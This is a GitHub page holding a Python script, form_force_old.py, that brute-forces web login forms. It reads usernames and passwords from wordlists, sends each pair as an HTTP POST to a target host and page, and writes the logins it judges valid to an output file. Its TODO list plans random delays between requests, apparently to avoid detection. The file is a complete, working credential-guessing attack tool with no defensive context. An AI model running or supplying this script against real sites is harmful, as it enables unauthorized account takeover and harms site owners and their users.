-
Notifications
You must be signed in to change notification settings - Fork 0
/
form_force_old.py
111 lines (90 loc) · 3.7 KB
/
form_force_old.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
#! /usr/bin/python3.12
"""
Brute force a web form.
usage: form_force.py [-h] [-u USERNAME] [-p PASSWORD] [-o OUTPUT] [-v] [-uf USERNAME_FIELD] [-pf PASSWORD_FIELD] host page
positional arguments:
host URL or IP address of the host
page Path to the form
options:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
Username or file of usernames
-p PASSWORD, --password PASSWORD
Password or file of passwords
-o OUTPUT, --output OUTPUT
Output file
-v, --verbose Verbose output
-uf USERNAME_FIELD, --username-field USERNAME_FIELD
Username field name
-pf PASSWORD_FIELD, --password-field PASSWORD_FIELD
Password field name
TODO Improvements:
- Threading
- Random time between requests
- pause/resume?
"""
import argparse
import logging
from pathlib import Path
import requests
HEADERS = {}
def brute_force_form(host, page, unames, pwords, out, uname_field, pword_field):
""" """
if not page.startswith("/"):
page = f"/{page}"
dest = f"http://{host}{page}"
logging.info(f"Brute forcing {dest} with {len(unames)} usernames and {len(pwords)} passwords")
cnt = 0
for uname in unames:
uname = uname.strip()
for pword in pwords:
pword = pword.strip()
logging.debug(f"Sending POST request with {uname}:{pword}")
response = requests.post(
dest,
data={uname_field: uname, pword_field: pword},
)
if response.status_code != 200:
logging.error(f"Unexpected status code: {response.status_code}")
exit(1)
if "Invalid" not in response.text:
out.write(f"{uname}:{pword}\n")
logging.debug(f"Valid credentials found: {uname}:{pword}")
cnt += 1
logging.info(f"Attempted {cnt} usernames")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Brute force a web form")
parser.add_argument("host", type=str, help="URL or IP address of the host")
parser.add_argument("page", type=str, help="Path to the form")
parser.add_argument("-u", "--username", type=str, help="Username or file of usernames")
parser.add_argument("-p", "--password", type=str, help="Password or file of passwords")
parser.add_argument("-o", "--output", type=str, help="Output file", default="logins.txt")
parser.add_argument("-v", "--verbose", action="store_true", help="Verbose output")
parser.add_argument(
"-uf", "--username-field", type=str, help="Username field name", default="uid"
)
parser.add_argument(
"-pf", "--password-field", type=str, help="Password field name", default="password"
)
args = parser.parse_args()
if args.verbose:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig(level=logging.INFO)
if Path(args.username).is_file():
logging.info(f"Using usernames from file {args.username}")
with open(args.username, "r", encoding='latin-1') as f:
unames = f.readlines()
else:
unames = [args.username]
if Path(args.password).is_file():
logging.info(f"Using passwords from file {args.password}")
with open(args.password, "r", encoding='latin-1') as f:
pwords = f.readlines()
else:
pwords = [args.password]
with open(args.output, "w") as out:
logging.info(f"Writing valid credentials to {args.output}")
brute_force_form(
args.host, args.page, unames, pwords, out, args.username_field, args.password_field
)